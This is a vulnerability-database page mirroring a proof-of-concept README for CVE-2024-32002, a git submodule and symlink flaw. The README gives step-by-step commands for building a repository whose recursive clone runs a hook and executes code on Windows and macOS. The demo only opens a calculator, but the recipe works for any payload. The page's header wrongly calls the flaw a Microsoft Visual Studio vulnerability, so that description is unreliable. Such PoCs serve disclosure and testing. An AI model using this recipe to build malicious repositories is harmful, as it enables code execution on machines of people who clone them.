漏洞平台

POC详情： 4f76a7b663661f1d9d5c3bdf2da6628e12d32126

来源

https://github.com/JakobTheDev/cve-2024-32002-poc-rce

关联漏洞

标题： Microsoft Visual Studio 安全漏洞 (CVE-2024-32002)
描述：Microsoft Visual Studio是美国微软（Microsoft）公司的一款开发工具套件系列产品，也是一个基本完整的开发工具集，它包括了整个软件生命周期中所需要的大部分工具。 Microsoft Visual Studio存在安全漏洞的相关信息，请随时关注CNNVD或厂商公告。

介绍

# CVE-2024-32002 RCE POC

A POC for CVE-2024-32002 demonstrating Remote Code Execution (RCE).

See [cve-2024-32002-poc-rce](https://github.com/JakobTheDev/cve-2024-32002-submodule-rce) for the related submodule repository.

## What this repo contains
- A symlink with an arbitraty name that links to the `.git` directory.
- A `.gitmodules` file that defines the malicious submodule.

## How to recreate this repo

This repo was created in Linux (WSL2, to be specific). This is important, the malicious repo can only be created on a case-sensitive filesystem.

1. Create a symlink, using all lowercase characters

```bash
ln -s .git submodule
```

Notes:
 - The symlink should point to the .git folder, since this is where we want to write files
 - The symlink name (submodule) is arbitrary, but should start with a lowercase character
 - This is important, because lowercase characters sort earlier than uppercase characters. When the clonong machine gets confused about where to write the submodule files, we want it to choose the symlink and not a normal directory.

2. Add the malicious submodule, noting the case difference on the submodule directory name

```bash
git submodule add --name rce/notexists https://github.com/JakobTheDev/cve-2024-32002-submodule-rce.git Submodule/modules/rce
```

Notes:
 - The name of the submodule ("rce/notexists") matters, it wil come into play when placing our hook in the submodule.
	- "rce" must match the last segment of the Submodule's path.
	- "notexists" must match the name of the directory containing hooks/post-checkout in the submodule directory. See [cve-2024-32002-poc-rce](https://github.com/JakobTheDev/cve-2024-32002-submodule-rce).
 - The structure of the submodule path ("Submodule/modules/rce") also matters:
 	- The first segment of the submodule's path ("Submodule") should match the symlink name above, just differing in case.
	- The second segment ("modules") matches the name of the path within the `.git` directory that tracks git status for submodules.
 	- The third segment ("rce") must natch the first segment of the submodule name above.

## How to run the POC

This vulnerability only affects Windows and MacOS because they both have case-insensitive filesystems.

1. Check whether you have a vulnerable version of git. See the [GitHub advisory](https://github.com/git/git/security/advisories/GHSA-8h77-4q3w-gfgv) for affected versions.
```bash
git --version
```
2. Think about whether you knowingly want to run a command that could achieve RCE... This repo is benign, but are you sure?
3. Run the following command:
```bash
git clone --recursive --config core.symlinks=true https://github.com/JakobTheDev/cve-2024-32002-poc-rce.git
```
4. If the POC worked, you should be able to do some calculating!

文件快照


 [4.0K]  /data/pocs/4f76a7b663661f1d9d5c3bdf2da6628e12d32126
├── [2.7K]  README.md
├── [   4]  submodule -> .git
└── [4.0K]  Submodule
    └── [4.0K]  modules
        └── [4.0K]  rce

4 directories, 1 file

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。